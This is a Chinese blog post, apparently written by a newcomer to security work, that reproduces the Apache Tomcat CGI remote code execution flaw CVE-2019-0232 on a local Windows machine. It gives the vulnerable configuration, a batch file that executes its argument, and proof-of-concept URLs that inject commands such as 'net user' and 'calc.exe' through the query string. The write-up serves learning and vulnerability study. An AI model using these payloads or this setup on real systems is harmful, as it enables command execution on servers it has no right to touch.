第一次复现漏洞 远程代码执行漏洞(CVE-2019-0232)

写在前面

        在公司呆了一段时间了，bug写了一小堆之后，我居然要开始接触漏洞的东西了，阿巴阿巴。还好这段时间老师带我，同事帮我，所幸没出什么错。然后今天第一次接触漏洞，漏洞是啥。名声在外，但是一直没实操过。于是今天。

        纷争开始了...

参考博客：

         参考博客一：这篇手把手教你复现

         参考博客二：这篇是原理

复现要求环境：

        这是一个Apache Tomcat 远程代码执行漏洞。

        配置要求：

                1. 系统为Windows

                2. 启用了CGI Servlet（默认为关闭）

                3. 启用了enableCmdLineArguments（Tomcat 9.0.*及官方未来发布版本默认为关闭）

        影响版本：      

                Apache Tomcat 9.0.0.M1 to 9.0.17

                Apache Tomcat 8.5.0 to 8.5.39

                Apache Tomcat 7.0.0 to 7.0.93

本文环境：

        服务端：本机（win10 20H2 [Version: 10.0.19042.1348]）

        客户端：本机谷歌浏览器

        tomcat版本：apache-tomcat-8.5.39

                附下载地址：apache-tomcat-8.5.39-windows-x64.zip

        jdk版本：jre1.8.0_301

                附下载地址：jre-8u301-windows-x64.tar.gz（不知道,下了好久了）

正文开始：

        第一步：

               解压jre，配置tomcat需要的java运行环境。

                JRE还是JDK无影响，找到下载的tomcat解压到一个你喜欢的目录：

                同样解压tomcat到你喜欢的目录，并找到它：

                 设置tomcat的环境变量，因为我不想设置系统环境变量，只为这个程序配置，因此只需要修改相关启动脚本，在apache-tomcat-8.5.39\bin\catalina.bat设置环境变量：

                 首行增加一句：set JRE_HOME="E:\env\jre1.8.0_301"  //这里换成你自己的jre路径。

       

        第二步：

                修改apache-tomcat-8.5.39\conf\server.xml 找到<servlet> 配置类，的cgi配置节，默认是注释的，自行取消注释。增加如下代码：

        <init-param>
          <param-name>executable</param-name>
          <param-value></param-value>
        </init-param>

                1、并修改cgiPathPrefix对应的参数值为WEB-INF/cgi-bin，原来一般是WEB-INF/cgi

 我的xml配置后为：

    <servlet>
        <servlet-name>cgi</servlet-name>
        <servlet-class>org.apache.catalina.servlets.CGIServlet</servlet-class>
        <init-param>
          <param-name>cgiPathPrefix</param-name>
          <param-value>WEB-INF/cgi-bin</param-value>
        </init-param>
        <init-param>
          <param-name>executable</param-name>
          <param-value></param-value>
        </init-param>
        <load-on-startup>5</load-on-startup>
    </servlet>

                2、并且取消映射段注释，即使

    <servlet-mapping>
        <servlet-name>cgi</servlet-name>
        <url-pattern>/cgi-bin/*</url-pattern>
    </servlet-mapping>

段的代码取消注释。

        第三步： 

                修改 apache-tomcat-8.5.39\conf\context.xml 配置文件，为<Context>节增加 privileged="true" 属性。

我的文件修改后为：

<Context privileged="true">

    <!-- Default set of monitored resources. If one of these changes, the    -->
    <!-- web application will be reloaded.                                   -->
    <WatchedResource>WEB-INF/web.xml</WatchedResource>
    <WatchedResource>${catalina.base}/conf/web.xml</WatchedResource>

    <!-- Uncomment this to disable session persistence across Tomcat restarts -->
    <!--
    <Manager pathname="" />
    -->
</Context>

        第四步：

                在apache-tomcat-8.5.39\webapps\ROOT\WEB-INF 目录下新建一个cgi-bin 文件夹，并在该文件夹内新建文件 hello.bat 

                编辑hello.bat 写入以下内容：

@echo off
echo Content-Type: text/plain
echo.
set foo=%~1
%foo%

        第五步：

                启动tomcat（apache-tomcat-8.5.39\bin\startup.bat）

                浏览器访问本地8080端口：127.0.0.1:8080

tomcat正常启动 访问8080端口

                至此，环境搭建完成。

漏洞复现：

                 Poc：

http://127.0.0.1:8080/cgi-bin/hello.bat?&C%3A%5CWindows%5CSystem32%5Cnet.exe+user

http://127.0.0.1:8080/cgi-bin/hello.bat?&C%3A%5CWindows%5CSystem32%5Ccalc.exe

拓展延伸：

        我们通过第第二篇引用博客里博主讲解的原理很容易知道，当浏览器访问以上触发漏洞的url时，会将url请求的参数部分按+号进行分割，最后执行时进行组合，因此我们可以自行组合任意执行大多数我们知道的cmd命令了，如：

                查看服务器网络连接状态：

                 让服务器ping 任意一个地址:

                 获取服务器的网络适配器的相关情况：

写在最后：

                这是第一次真的自己手动实际操作去复现一个漏洞，当然这个漏洞十分简陋，而且教程傻瓜式。启蒙第一课，还是感觉好神奇啊。打开了潘多拉的魔盒